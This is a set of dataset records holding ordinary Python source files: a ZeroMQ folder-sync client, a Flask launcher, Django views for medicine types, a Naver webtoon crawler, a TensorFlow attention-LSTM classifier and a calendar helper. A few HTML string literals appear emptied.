+{"seq_id":"385780532","text":"__author__ = 'wbk3zd'\n\nimport os\nimport shutil\nimport threading\nimport time\nfrom copy import deepcopy\n\nimport zmq\n\ntry:\n from Helpers.Encodings import *\n from Helpers.Logging.OneDirLogger import EventLogger\nexcept ImportError:\n from FinalOneDir.Helpers.Encodings import *\n from FinalOneDir.Logging.OneDirLogger import EventLogger\n\n\nclass SyncResponder():\n def __init__(self, msg_identifier):\n #Components\n self.context = zmq.Context()\n self.logger = EventLogger()\n\n #Attributes\n self.msg_identifier = msg_identifier\n self.config = None\n self.listen_flag = threading.Event()\n self.listen_flag.clear()\n\n #Networking\n self.internal_request_lock = threading.RLock()\n self.internal_request_socket = self.context.socket(zmq.PUSH)\n self.server_sync_throw_lock = threading.RLock()\n self.server_sync_throw_socket = self.context.socket(zmq.SUB)\n\n \"\"\"\n Public methods\n \"\"\"\n def initialize(self, config):\n \"\"\"\n Sets up configuration values and connects sockets\n \"\"\"\n self.config = config\n\n #Initialize components\n logfile = \".\" + SLASH + \"responder.log\"\n self.logger.init_session(logfile)\n\n #Socket connections\n self.internal_request_socket.connect(\"tcp://localhost:\" + self.config[\"INTERNAL_REQUEST_PORT\"])\n self.logger.log(\"INFO\",\"Connecting responder to internal client controller over tcp port \" + self.config[\"INTERNAL_REQUEST_PORT\"] + \"...\")\n\n #Subscribe to sync throws for configured username\n self.server_sync_throw_socket.setsockopt(zmq.SUBSCRIBE, self.config[\"USERNAME\"].encode('ascii', 'replace'))\n self.server_sync_throw_socket.connect(\"tcp://\" + self.config[\"SERVER_ADDR\"] + \":\" + self.config[\"SERVER_SYNC_THROW_PORT\"])\n self.logger.log(\"INFO\",\"Subscribed to sync directives at tcp://\" + self.config[\"SERVER_ADDR\"] + \":\" + self.config[\"SERVER_SYNC_THROW_PORT\"] + \" for user \" + self.config[\"USERNAME\"] + \"...\")\n\n def start(self):\n \"\"\"\n Spawns a new thread with target _listen_ to listen for sync\n directives published by server.\n \"\"\"\n if self.listen_flag.is_set():\n return\n else:\n self.listen_flag.set()\n threading.Thread(target=self._listen_).start()\n self.logger.log(\"INFO\",\"Responder is listening for sync directives at tcp://\" + self.config[\"SERVER_ADDR\"] + \":\" + self.config[\"SERVER_SYNC_THROW_PORT\"] + \" for user \" + self.config[\"USERNAME\"] + \"...\")\n\n def pause(self):\n \"\"\"\n Causes any thread in _listen_ to exit gracefully\n \"\"\"\n self.logger.log(\"INFO\",\"Responder has paused. No longer listening for sync directives\")\n self.listen_flag.clear()\n\n def stop(self):\n \"\"\"\n Like pause, but allows for additional cleanup.\n Causes any thread in _listen_ to exit gracefully\n \"\"\"\n self.logger.log(\"INFO\",\"Responder is being killed. Going down permanently.\")\n self.listen_flag.clear()\n\n \"\"\"\n Protected methods\n \"\"\"\n def _listen_(self):\n \"\"\"\n Run in a separate thread. Listens for sync directives published by server\n for the subscribed username. Dispatches caught directives to a new thread\n for processing.\n \"\"\"\n while(self.listen_flag.is_set()):\n #Receive and dispatch until the end of time (or until listen_flag is cleared)\n msg = self.server_sync_throw_socket.recv_multipart()\n msg = decode(msg)\n\n #Remove topic from message where topic is username\n msg.remove(msg[0])\n\n #Dispatch command\n threading.Thread(target=self._dispatch_, args=(msg,)).start()\n\n #Strip away file contents before logging message\n msg_clone = deepcopy(msg)\n if msg_clone[0] == self.msg_identifier[\"FILESYNC\"]:\n msg_clone[-1] = \"\"\n\n #Log\n self.logger.log(\"INFO\",\"Sync Directive received: \" + str(msg_clone))\n\n\n def _dispatch_(self, msg):\n \"\"\"\n Entry point for all threads spawned from a message received in\n _listen_. Identifies the sync directive type and calls the appropriate\n internal method to handle.\n \"\"\"\n #Check to see if message was empty\n if not msg[0]:\n self.logger.log(\"ERROR\",\"Empty message received from server\")\n return\n\n #Send internal request to controller to stop daemon monitoring of directory, we are about to write\n out = [self.msg_identifier[\"STOP_MONITORING\"], str(threading.current_thread().ident)]\n with self.internal_request_lock:\n self.internal_request_socket.send_multipart(encode(out))\n\n #Give controller and daemon a moment to get their affairs in order\n time.sleep(1)\n\n #Dispatch\n if msg[0] == self.msg_identifier[\"FILESYNC\"]:\n self._on_sync_(msg)\n elif msg[0] == self.msg_identifier[\"MKDIR\"]:\n self._on_mkdir_(msg)\n elif msg[0] == self.msg_identifier[\"DELETE\"]:\n self._on_remove_(msg)\n elif msg[0] == self.msg_identifier[\"MOVE\"]:\n self._on_move_(msg)\n elif msg[0] == self.msg_identifier[\"KILL\"]:\n msg = [self.msg_identifier[\"KILL\"]]\n self.internal_request_socket.send_multipart(encode(msg)) #Notify controller of impending doom\n else:\n self.logger.log(\"ERROR\",\"Unrecognized message. Closing without handle: \" + str(msg))\n\n #Cleanup (resumes daemon)\n self._on_finish_()\n\n def _on_sync_(self, msg):\n \"\"\"\n Handles file sync events by writing sent contents\n to disk.\n \"\"\"\n #Get absolute path by appending path base\n dest_path = self.config[\"PATH_BASE\"] + msg[1]\n\n #Create the target directory if it does not exist\n if not os.path.exists(os.path.dirname(dest_path)):\n os.makedirs(os.path.dirname(dest_path))\n\n #Log and write\n self.logger.log(\"INFO\",\"Updating file at \" + dest_path)\n with open(dest_path, 'wb') as user_file:\n user_file.write(msg[2])\n\n def _on_mkdir_(self, msg):\n \"\"\"\n Creates a directory at the specified relative path if it does not exist\n \"\"\"\n #Create final destination by appending path base\n dest_path = self.config[\"PATH_BASE\"] + msg[1]\n\n #Create a directory, or not, the choice is yours\n if(os.path.isdir(dest_path)):\n self.logger.log(\"INFO\",\"Directory already exists, ignoring make command: \" + str(msg))\n else:\n self.logger.log(\"INFO\",\"Creating directory at \" + dest_path)\n os.makedirs(dest_path)\n\n def _on_remove_(self, msg):\n \"\"\"\n Deletes the filesystem object at the specified target, recursively if relevant\n \"\"\"\n dest_path = self.config[\"PATH_BASE\"] + msg[1]\n\n #If object does not exist, all done\n if not os.path.exists(dest_path):\n self.logger.log(\"WARNING\", dest_path + \" does not exist. Can't remove: \" + str(msg))\n #Otherwise, remove as appropriate\n elif(os.path.isdir(dest_path)):\n self.logger.log(\"INFO\",\"Removing entire file tree at \" + dest_path)\n shutil.rmtree(dest_path)\n else:\n self.logger.log(\"INFO\",\"Removing file at\" + dest_path)\n os.remove(dest_path)\n\n def _on_move_(self, msg):\n \"\"\"\n Called anytime a file system object is moved\n \"\"\"\n\n #Get absolute paths\n src_path = self.config[\"PATH_BASE\"] + msg[1]\n dest_path = self.config[\"PATH_BASE\"] + msg[2]\n\n #If source doesn't exist, throw an error\n if not os.path.exists(src_path):\n self.logger.log(\"ERROR\",\"File system object at \" + dest_path + \" does not exist. Cannot move: \" + str(msg))\n #Otherwise, handle as appropriate\n elif(os.path.isdir(src_path)):\n self.logger.log(\"INFO\",\"Moving directory at \" + src_path + \" to \" + dest_path)\n shutil.copytree(src_path, dest_path)\n shutil.rmtree(src_path)\n else:\n self.logger.log(\"INFO\",\"Moving file at\" + src_path + \"to\" + dest_path)\n shutil.copy2(src_path, dest_path)\n os.remove(src_path)\n\n def _on_finish_(self):\n \"\"\"\n Called by every thread after it has finished its dispatch task.\n Asks controller to restore daemon operation. Other cleanup can go here\n as well.\n \"\"\"\n with self.server_sync_throw_lock:\n msg = [self.msg_identifier[\"START_MONITORING\"],str(threading.current_thread().ident)]\n self.internal_request_socket.send_multipart(encode(msg))","sub_path":"FinalOneDir/Controllers/Client/ClientSyncResponder.py","file_name":"ClientSyncResponder.py","file_ext":"py","file_size_in_byte":8888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"491957033","text":"from flask import Flask\nfrom .isite import Site_Main_Flask_Obj\nfrom logging import getLogger\nimport sys\n\nlogger = getLogger(__name__)\nlogger.setLevel('DEBUG')\n\nprint('hello', file=sys.stderr)\n\napp = Flask(__name__)\napp.register_blueprint(Site_Main_Flask_Obj)\n\n\nport=5000\nprint('hello2', file=sys.stderr)\nlogger.debug('starting iserver on port %d' % port)\nprint('starting iserver on port %d' % port, file=sys.stderr)\napp.run(host='0.0.0.0', port=port)\n","sub_path":"iserver/iserver.py","file_name":"iserver.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"487927849","text":"from django_datatables_view.base_datatable_view import BaseDatatableView\nfrom django.utils.html import escape\nfrom register_disease_data.models import MedicineType\nfrom django.db.models import Q\nfrom django.http import HttpResponse\nfrom django.shortcuts import get_object_or_404\nimport traceback\n\n\nclass medicineType_datatable(BaseDatatableView):\n order_columns = ['name']\n columns = ['name','id']\n def get_initial_queryset(self):\n return MedicineType.objects.order_by(\"id\")\n def filter_queryset(self, qs):\n search = self.request.GET.get('search[value]', None)\n if search:\n qs = qs.filter(name__contains=search)\n filter_customer = self.request.GET.get('MedicineType', None)\n\n if filter_customer:\n customer_parts = filter_customer.split(' ')\n qs_params = None\n for part in customer_parts:\n q = Q(customer_firstname__contains=part)|Q(customer_lastname__contains=part)\n qs_params = qs_params | q if qs_params else q\n qs = qs.filter(qs_params)\n return qs\n\n def prepare_results(self, qs):\n\n json_data = []\n for item in qs:\n json_data.append([\n escape(item.name),\n item.id\n ])\n return json_data\n\n\n\ndef browse_medicineType_name(request):\n if request.method == 'POST':\n key = request.POST.get('key')\n if not key:\n return HttpResponse(\"\")\n filtered_data=MedicineType.objects.filter(name__contains=key)[0:10]\n html='';\n for data in filtered_data:\n html=html.__add__('' % data.name)\n return HttpResponse(html)\n return HttpResponse(\"invalid access!\")\n\n\n\ndef save_medicineType(request):\n if request.method == 'POST':\n name = request.POST.get('name')\n if not name:\n return HttpResponse(\"Enter valid name!\")\n name=name.strip().replace('\"', '')\n if name==\"\":\n return HttpResponse(\"Enter valid name!\")\n try:\n MedicineTypeData=MedicineType.objects.get(name=name)\n return HttpResponse(\"This name already registered!\");\n except MedicineType.DoesNotExist:\n try:\n MedicineType.objects.create(name=name,registralUserName_id=1).save()\n return HttpResponse(\"yes\")\n except Exception as e:\n return HttpResponse(\"error occurred\");\n return HttpResponse(\"invalid access!\")\n\n\n\n\ndef update_medicineType(request):\n if request.method == 'POST':\n name = request.POST.get('name')\n id = request.POST.get('id')\n if not name:\n return HttpResponse(\"Enter valid name!\")\n if not id:\n return HttpResponse(\"Select valid medicine type to update!\")\n name=name.strip().replace('\"', '')\n\n if name==\"\":\n return HttpResponse(\"Enter valid name!\")\n\n try:\n data=MedicineType.objects.get(pk=id)\n try:\n MedicineTypeData = MedicineType.objects.exclude(pk=id).filter(name=name)[0:10]\n if MedicineTypeData.exists():\n return HttpResponse(\"This name already exist!\");\n try:\n MedicineType.objects.filter(pk=id).update(name=name)\n return HttpResponse(\"yes\")\n except Exception as e:\n return HttpResponse(\"error occurred\");\n except MedicineType.DoesNotExist:\n try:\n MedicineType.objects.filter(pk=id).update(name=name)\n return HttpResponse(\"yes\")\n except Exception as e:\n return HttpResponse(\"error occurred\");\n except MedicineType.DoesNotExist:\n return HttpResponse(\"Select valid medicine type to update!\")\n return HttpResponse(\"invalid access!\")\n\n\n\n\ndef delete_medicineType(request):\n if request.method == 'POST':\n id = request.POST.get('id')\n if not id:\n return HttpResponse(\"Select valid medicine type to delete!\")\n try:\n data=MedicineType.objects.get(pk=id)\n MedicineType.objects.filter(pk=id).delete()\n return HttpResponse(\"yes\")\n except MedicineType.DoesNotExist:\n return HttpResponse(\"Select valid medicine type to delete!\")\n return HttpResponse(\"invalid access!\")\n","sub_path":"hdds/manage_medicine_type/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"85264100","text":"# -*- coding: utf-8 -*-\n\nimport time\nimport os\nimport requests as rq\nfrom bs4 import BeautifulSoup as bs\nfrom multiprocessing import Process as proc\nimport codecs as cd\nimport re\n\n'''\nalgorithm:\n get 요일 : 월~일\n get 웹툰이름 : 각각의 요일대로 attach\n get 웹툰순위 : 웹툰 이름 가져올 때 그 순서에 순위매기기\n get 웹툰URL : 웹툰 이름에 attach\n\n print 요일별 웹툰 by order 순위\n print user choices menu\n i.e) one choice : >>> mon1\n i.e) many choice : >>> mon1 sun3 sat 2\n wait user input\n\n user input? start crawl \n\ndata type:\n {$요일$:{$웹툰순위$:{$웹툰이름$:$웹툰URL$}, ...}, ...}\ndata type scheme:\n 월--+\n +-- (1) ---+-- 신의탑\n + +-- ($신의탑URL$)\n +-- (2) ------ (웹툰이름)\n +-- ($URL$)\n 화--+\n +-- (1) ---+-- (웹툰이름)\n + +-- ($URL$)\n +-- (2) ------ (웹툰이름)\n +-- ($URL$)\n'''\n\ndef htmling(title, subtitle, img_numbers, directory):\n html = ''\n head = ''''''\n titles = title+' '+subtitle\n body = '''\n \n '''\n img_tag = ['
']\n img_tags = []\n for img_number in img_numbers:\n img_tags.append(img_tag[0]+str(img_number)+img_tag[1])\n tail = '''
'''\n\n html += head\n html += titles\n html += body\n for img in img_tags:\n html += img \n html += tail\n \n html_path = os.path.join(directory, titles+'.html')\n\n with cd.open(html_path,'w', 'utf-8') as f:\n f.write(html)\n \n print(titles+' '+': crawl success')\n\ndef crawl(url):\n html = rq.get(url).text\n soup = bs(html, 'html.parser')\n\n title = ' '.join(soup.select('.comicinfo h2')[0].text.split())\n subtitle = ' '.join(soup.select('.tit_area h3')[0].text.split())\n\n if subtitle.find(u'부') is -1:\n subtitle = ' '.join([u'1부', subtitle])\n\n img_numbers = []\n \n for i in range(len(soup.select('.wt_viewer img'))):\n img_numbers.append(i+1)\n img = soup.select('.wt_viewer img')[i]\n dir_path = os.path.join(os.path.dirname(__file__), title, subtitle)\n if not os.path.exists(dir_path):\n os.makedirs(dir_path)\n file_path = os.path.join(dir_path, str(i+1)+'.jpg')\n \n image = rq.get(img['src'], headers={'Referer': url}).content\n with open(file_path, 'wb') as f: f.write(image)\n\n htmling(title=title, subtitle=subtitle, img_numbers=img_numbers, directory=dir_path)\n \ndef multi_crawl(target_url, ran, ge):\n\n for i in range(ran,ge):\n crawl(target_url+str(i))\n time.sleep(1)\n\nif __name__ ==\"__main__\":\n #\n # SETUP\n #\n root_url = 'http://comic.naver.com'\n main_url = root_url + '/webtoon/weekday.nhn'\n html = rq.get(main_url).text\n soup = bs(html, 'html.parser')\n\n #\n # SET 요일\n #\n day_of_week = {\n 'mon':'월요 웹툰',\n 'tue':'화요 웹툰',\n 'wed':'수요 웹툰',\n 'thu':'목요 웹툰',\n 'fri':'금요 웹툰',\n 'sat':'토요 웹툰',\n 'sun':'일요 웹툰'\n }\n data_set = {}\n for day in day_of_week.keys():\n data_set[day]={}\n ### 완성 : {mon:{}, tue:{}, wed:{}, ...}\n\n #\n # \"GET 웹툰 이름, 순위, URL\" 를 위한 데이터 수집\n #\n\n days_webtoon = soup.select('.list_area ul')\n ''' \n ul : 요일별 웹툰리스트를 가져옴\n days_webtoon[0].select('a.title') : 월요일 웹툰들.\n days_webtoon[0].select('a.title')[0] : 신의탑.\n '''\n days=[]\n for idx in range(len(days_webtoon)):\n days.append(days_webtoon[idx].select('a.title'))\n '''\n days[0] : 월요일 웹툰들.\n days[0][0] : 신의탑. \n (참조 : days[0][0].text : 신의탑 이름)\n (참조 : days[0][0]['href'] : 신의탑 URL)\n '''\n\n #\n # SET data_set\n #\n '''\n data_set[월요웰툽][1]={이름:URL} 이걸 한꺼번에 하는 코드\n i ii iii iv\n i -> 정의:요일 // 구체화:for idx in range(len(data_set.keys())):\n data_set.keys()[idx]\n ii -> 정의:순위 // 구체화:for rank in range(len(days[idx])):\n rank\n iii -> 정의:웹툰이름 // 구체화: days[idx][rank].text\n iv -> 정의:웹툰URL // 구체화: days[idx][rank]['href']\n 종합:\n '''\n keys = list(data_set.keys())\n for idx in range(len(keys)):\n for rank in range(len(days[idx])):\n data_set[keys[idx]][rank+1] = (\n days[idx][rank].text , days[idx][rank]['href']\n )\n ### 완성 {'mon':{1:('신의탑',$웹툰URL$), ...}, ...}\n for day in data_set.keys():\n print(day_of_week[day])\n for rank in data_set[day].keys():\n title, url = data_set[day][rank]\n print(str(rank)+' : '+title)\n print('\\n')\n print('월 - mon, 화 - tue, 수 - wed, 목 - thu, 금 - fri, 토 - sat, 일 - sun')\n print('크롤링 할 코드를 입력하세요. 예를 들어 신의탑 크롤링은 mon1 입력.')\n user_input = input('>>> ')\n day = user_input[:3]\n rank = user_input[3:]\n \n list_url = root_url + data_set[day][int(rank)][1]\n titleId = re.findall(r'titleId=\\d+', list_url)[0].split('=')[1]\n\n html = rq.get(list_url).text\n soup = bs(html, 'html.parser')\n\n links = soup.select('.title a')\n latest_no = 1+int(\n re.findall(r'no=\\d+', links[0]['href'])[0]\n .split('=')[1])\n\n target_url = root_url+'/webtoon/detail.nhn?titleId='+titleId+'&no='\n\n div = round(latest_no/5)\n\n proc1 = proc(target=multi_crawl,args=(target_url, 1, div,))\n proc2 = proc(target=multi_crawl,args=(target_url, div+1, div*2,))\n proc3 = proc(target=multi_crawl,args=(target_url, div*2+1, div*3,))\n proc4 = proc(target=multi_crawl,args=(target_url, div*3+1, div*4,))\n proc5 = proc(target=multi_crawl,args=(target_url, div*4+1, latest_no,))\n\n proc1.start()\n proc2.start()\n proc3.start()\n proc4.start()\n proc5.start()\n\n proc1.join()\n proc2.join()\n proc3.join()\n proc4.join()\n proc5.join()\n","sub_path":"main_page.py","file_name":"main_page.py","file_ext":"py","file_size_in_byte":7148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"36835936","text":"import tensorflow as tf\nimport numpy as np\n\n\n\"\"\"\n bi_attn_lstm model\n\"\"\"\n\nclass EncoderModel(object):\n\n def __init__(self,\n batch_size,\n glossary_size,\n embedding_size,\n hidden_size,\n attn_lenth):\n self.batch_size = batch_size\n self.glossary_size = glossary_size\n self.embedding_size = embedding_size\n self.hidden_size = hidden_size\n self.attn_lenth = attn_lenth\n\n\n def build_train_graph(self):\n inputs, lenth, labels = self.define_IO()\n self.trainable_parameters()\n inputs = self.embedding_layer(inputs)\n outputs = self.bi_attn_lstm_layer(inputs, lenth)\n outputs = self.bi_sigmoid_layer(outputs)\n self.loss_and_optimize(outputs, labels)\n\n\n def define_IO(self):\n self.inputs = tf.placeholder(tf.int32, shape=[self.batch_size, None], name='inputs')\n self.labels = tf.placeholder(tf.float32, shape=[self.batch_size, 1], name='targets')\n self.lenth = tf.placeholder(tf.int32, shape=[self.batch_size], name='lenth')\n self.pretrained_wv = tf.placeholder(tf.float32, shape=[self.glossary_size, self.embedding_size])\n return self.inputs, self.lenth, self.labels\n\n\n def trainable_parameters(self):\n self.keep_prob = 0.5\n with tf.name_scope('embeddings'), tf.variable_scope('embeddings'):\n # self.embeddings = tf.Variable(self.pretrained_wv, name='embeddings')\n self.embeddings = tf.Variable(tf.truncated_normal([self.glossary_size, self.embedding_size], stddev=0.1), name='embeddings')\n with tf.name_scope('lstm'), tf.variable_scope('lstm'):\n self.lstm_fw_cell = tf.contrib.rnn.BasicLSTMCell(self.hidden_size, forget_bias=1.0, state_is_tuple=True)\n self.lstm_bw_cell = tf.contrib.rnn.BasicLSTMCell(self.hidden_size, forget_bias=1.0, state_is_tuple=True)\n with tf.name_scope('attention'), tf.variable_scope('attention'):\n self.u1_w = tf.Variable(tf.truncated_normal([2*self.hidden_size, self.attn_lenth], stddev=0.1), name='attention_w')\n self.u1_b = tf.Variable(tf.constant(0.1, shape=[self.attn_lenth]), name='attention_b')\n self.u2_w = tf.Variable(tf.truncated_normal([self.attn_lenth, 1], stddev=0.1), name='attention_uw')\n with tf.name_scope('lastlayer'), tf.variable_scope('lastlayer'):\n self.sigmoid_weights = tf.Variable(tf.random_uniform(shape=[self.hidden_size * 2, 1], minval=-1.0, maxval=1.0), name='sigmoid_w')\n self.sigmoid_biases = tf.Variable(tf.zeros([1]), name='sigmoid_b')\n\n\n \"\"\"\n arg:\n inputs - shape=[batch_size, seq_size]\n return:\n outputs - shape=[batch_size, seq_size, hidden_size]\n \"\"\"\n def embedding_layer(self, inputs):\n with tf.name_scope('embeddings'), tf.variable_scope('embeddings'):\n embeded_outputs = tf.nn.embedding_lookup(self.embeddings, inputs)\n embeded_outputs = tf.nn.dropout(embeded_outputs, keep_prob=self.keep_prob)\n return embeded_outputs\n\n\n \"\"\"\n arg:\n inputs - shape=[batch_size, seq_size, hidden_size]\n return:\n outputs - shape=[batch_size, hidden_size*2]\n \"\"\"\n def bi_attn_lstm_layer(self, inputs, lenth):\n with tf.name_scope('lstm'), tf.variable_scope('lstm'):\n drop_lstm_fw_cell = tf.contrib.rnn.DropoutWrapper(cell=self.lstm_fw_cell, output_keep_prob=self.keep_prob)\n drop_lstm_bw_cell = tf.contrib.rnn.DropoutWrapper(cell=self.lstm_bw_cell, output_keep_prob=self.keep_prob)\n\n rnn_outputs, _ = tf.nn.bidirectional_dynamic_rnn(drop_lstm_fw_cell, drop_lstm_bw_cell, inputs, sequence_length=lenth, dtype=tf.float32)\n rnn_outputs = tf.concat(rnn_outputs, axis=2)\n\n # 'outputs' is now shape of[128*60*600]\n # a = softmax(u2_w(tanh(u1_w*x+u1_b)))\n # outputs = tf.reshape(outputs, [-relu, 2*self.hidden_size])\n # attn_z = tf.matmul(outputs, self.u1_w) + self.u1_b\n # outputs = tf.reshape(outputs, [self.batch_size, self.seq_size, 2*self.hidden_size])\n # attn_z = tf.reshape(tf.matmul(attn_z, self.u2_w), [self.batch_size, self.seq_size])\n # alpha = tf.nn.softmax(attn_z)\n # alpha = tf.reshape(alpha, [self.batch_size, self.seq_size, relu])\n # self.alpha = alpha\n # outputs = tf.reduce_sum(outputs * alpha, axis=relu)\n with tf.name_scope('attention'), tf.variable_scope('attention'):\n attn_outputs = []\n for i in range(self.batch_size):\n attn_output = rnn_outputs[i][:lenth[i]]\n attn_z = tf.matmul(tf.tanh(tf.matmul(attn_output, self.u1_w) + self.u1_b), self.u2_w)\n alpha = tf.nn.softmax(attn_z)\n attn_output = tf.reduce_sum(attn_output * alpha, axis=0)\n attn_outputs.append(attn_output)\n attn_outputs = tf.convert_to_tensor(attn_outputs)\n return attn_outputs\n\n\n \"\"\"\n arg:\n inputs - shape=[batch_size, hidden_size]\n return:\n outputs - shape=[batch_size, relu]\n \"\"\"\n def bi_sigmoid_layer(self, inputs):\n with tf.name_scope('lastlayer'), tf.variable_scope('lastlayer'):\n logits = tf.matmul(inputs, self.sigmoid_weights) + self.sigmoid_biases\n return logits\n\n\n \"\"\"\n arg:\n inputs - shape=[batch_size, seq_size, glossary_size]\n labels - shape=[batch_size, seq_size]\n return:\n outputs - shape=[batch_size, seq_size, hidden_size]\n \"\"\"\n def loss_and_optimize(self, inputs, labels):\n self.learning_rate = tf.placeholder(tf.float32)\n\n loss = tf.nn.sigmoid_cross_entropy_with_logits(logits=inputs, labels=labels)\n self.loss = tf.reduce_mean(loss)\n\n train_vars = tf.trainable_variables()\n self.max_grad_norm = 1\n grads, _ = tf.clip_by_global_norm(tf.gradients(loss, train_vars), self.max_grad_norm)\n\n # self.optimizer = tf.train.GradientDescentOptimizer(self.learning_rate).apply_gradients(zip(grads, train_vars))\n self.optimizer = tf.train.AdamOptimizer(self.learning_rate).minimize(loss)\n\n self.train_scalar = tf.summary.scalar('train_loss', self.loss)\n self.train_accuracy = tf.reduce_mean(tf.cast(tf.equal(tf.round(tf.sigmoid(inputs)), labels), tf.float32))\n\n\n\n def build_validate_graph(self, dev_batch_size):\n # IO\n self.dev_inputs = tf.placeholder(tf.int32, shape=[dev_batch_size, None])\n self.dev_labels = tf.placeholder(tf.float32, shape=[dev_batch_size, 1])\n self.dev_lenth = tf.placeholder(tf.int32, shape=[dev_batch_size])\n\n with tf.name_scope('valid'), tf.variable_scope('valid'):\n embeded_outputs = tf.nn.embedding_lookup(self.embeddings, self.dev_inputs)\n\n rnn_outputs, _ = tf.nn.bidirectional_dynamic_rnn(self.lstm_fw_cell, self.lstm_bw_cell, embeded_outputs, sequence_length=self.dev_lenth, dtype=tf.float32)\n rnn_outputs = tf.concat(rnn_outputs, axis=2)\n\n attn_outputs = []\n for i in range(dev_batch_size):\n attn_output = rnn_outputs[i][:self.dev_lenth[i]]\n attn_z = tf.matmul(tf.tanh(tf.matmul(attn_output, self.u1_w) + self.u1_b), self.u2_w)\n alpha = tf.nn.softmax(attn_z)\n attn_output = tf.reduce_sum(attn_output * alpha, axis=0)\n attn_outputs.append(attn_output)\n attn_outputs = tf.convert_to_tensor(attn_outputs)\n\n logits = tf.matmul(attn_outputs, self.sigmoid_weights) + self.sigmoid_biases\n loss = tf.nn.sigmoid_cross_entropy_with_logits(logits=logits, labels=self.dev_labels)\n self.dev_loss = tf.reduce_sum(loss) / dev_batch_size\n self.dev_scalar = tf.summary.scalar('validation_loss', self.dev_loss)\n\n self.expection = tf.sigmoid(logits)\n self.dev_accuracy = tf.reduce_mean(tf.cast(tf.equal(tf.round(tf.sigmoid(logits)), self.dev_labels), tf.float32))\n\n\n\n\n def build_test_graph(self, seq_size):\n # IO\n self.test_inputs = tf.placeholder(tf.int32, shape=[None, seq_size])\n self.test_labels = tf.placeholder(tf.float32, shape=[None, 1])\n self.test_lenth = tf.placeholder(tf.int32, shape=[None])\n\n # init\n self.embeddings = tf.Variable(tf.random_uniform(shape=[self.glossary_size, self.embedding_size],\n minval=-1.0, maxval=1.0), name='embeddings')\n self.lstm_fw_cell = tf.contrib.rnn.BasicLSTMCell(self.hidden_size, forget_bias=1.0, state_is_tuple=True)\n self.lstm_bw_cell = tf.contrib.rnn.BasicLSTMCell(self.hidden_size, forget_bias=1.0, state_is_tuple=True)\n\n # embedding\n embeded_outputs = tf.nn.embedding_lookup(self.embeddings, self.test_inputs)\n # rnn\n rnn_outputs, _ = tf.nn.bidirectional_dynamic_rnn(self.lstm_fw_cell, self.lstm_bw_cell, embeded_outputs,\n sequence_length=self.test_lenth, dtype=tf.float32)\n rnn_outputs = tf.concat(rnn_outputs, axis=2)\n\n with tf.name_scope('attention'), tf.variable_scope('attention'):\n self.u1_w = tf.Variable(tf.truncated_normal([2 * self.hidden_size, self.attn_lenth], stddev=0.1),\n name='attention_w')\n self.u1_b = tf.Variable(tf.constant(0.1, shape=[self.attn_lenth]), name='attention_b')\n self.u2_w = tf.Variable(tf.truncated_normal([self.attn_lenth, 1], stddev=0.1), name='attention_uw')\n rnn_outputs = tf.reshape(rnn_outputs, [-1, 2 * self.hidden_size])\n attn_z = tf.matmul(rnn_outputs, self.u1_w) + self.u1_b\n rnn_outputs = tf.reshape(rnn_outputs, [-1, seq_size, 2 * self.hidden_size])\n attn_z = tf.reshape(tf.matmul(attn_z, self.u2_w), [-1, seq_size])\n alpha = tf.nn.softmax(attn_z)\n alpha = tf.reshape(alpha, [-1, seq_size, 1])\n rnn_outputs = tf.reduce_sum(rnn_outputs * alpha, axis=1)\n self.alpha = alpha\n\n # sigmoid\n sigmoid_weights = tf.Variable(tf.random_uniform(shape=[self.hidden_size * 2, 1],\n minval=-1.0, maxval=1.0), name='softmax_weights')\n sigmoid_biases = tf.Variable(tf.zeros([1]), name='softmax_biases')\n logits = tf.matmul(rnn_outputs, sigmoid_weights) + sigmoid_biases\n loss = tf.nn.sigmoid_cross_entropy_with_logits(logits=logits, labels=self.test_labels)\n self.test_loss = tf.reduce_mean(loss)\n\n # accuracy rate\n self.expection = tf.round(tf.sigmoid(logits))\n self.test_accuracy = tf.reduce_mean(tf.cast(tf.equal(tf.round(tf.sigmoid(logits)), self.test_labels), tf.float32))","sub_path":"history_version/v0.0/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":10823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"639648889","text":"import datetime\nfrom sanitize import test_usr, get_datetime_obj\nfrom event import Event\n\ndef make_year(year=datetime.datetime.now().year):\n \"\"\"This returns a yearly calendar as shown above\"\"\"\n cal = {year: {}}\n thirty_one = [1,3,5,7,8,10,12]\n for month in range(1,13):\n if month in thirty_one:\n days = dict(zip([x for x in range(1,32)], [[] for x in range(1,32)]))\n cal[year][month] = days\n elif month == 2:\n days = dict(zip([x for x in range(1,29)], [[] for x in range(1,29)]))\n cal[year][month] = days\n else:\n days = dict(zip([x for x in range(1,31)], [[] for x in range(1,31)]))\n cal[year][month] = days\n\n with open('cal.dict', 'w') as file:\n file.write(cal.__repr__())\n return cal\n\ndef add_event():\n if test_usr('\\nNeed to add something?'):\n print(\"\\nYOU GOT IT, ONE EVENT OBJECT COMING RIGHT AFTER THESE MESSAGES\")\n \n e_obj = Event(get_datetime_obj())\n\n e_obj.print_event_details()\n","sub_path":"manipulate_cal.py","file_name":"manipulate_cal.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
